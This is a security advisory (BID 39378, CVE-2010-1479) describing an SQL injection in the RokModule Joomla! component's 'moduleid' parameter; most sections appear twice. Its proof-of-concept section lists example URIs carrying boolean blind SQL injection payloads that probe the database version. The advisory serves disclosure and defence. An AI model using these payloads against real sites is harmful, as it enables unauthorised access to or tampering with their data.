RocketTheme RokModule Joomla! Component 'moduleid' Parameter SQL Injection Vulnerability
BID:39378
CVE-2010-1479 |Info
RocketTheme RokModule Joomla! Component 'moduleid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 39378 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-1479 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 11 2010 12:00AM |
| Updated: | Sep 12 2012 12:40PM |
| Credit: | AntiSecurity |
| Vulnerable: |
RocketTheme RokModule 1.1 |
| Not Vulnerable: | |
Discussion
RocketTheme RokModule Joomla! Component 'moduleid' Parameter SQL Injection Vulnerability
The RocketTheme RokModule component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The RocketTheme RokModule component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
RocketTheme RokModule Joomla! Component 'moduleid' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=5 << true
http://www.example.com/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=4 << false
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=5 << true
http://www.example.com/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=4 << false
Solution / Fix
RocketTheme RokModule Joomla! Component 'moduleid' Parameter SQL Injection Vulnerability
Solution:
Vendor updates are available. Please see the references for more information.
Solution:
Vendor updates are available. Please see the references for more information.
References
RocketTheme RokModule Joomla! Component 'moduleid' Parameter SQL Injection Vulnerability
References:
References:
- RokModule Homepage (RocketTheme)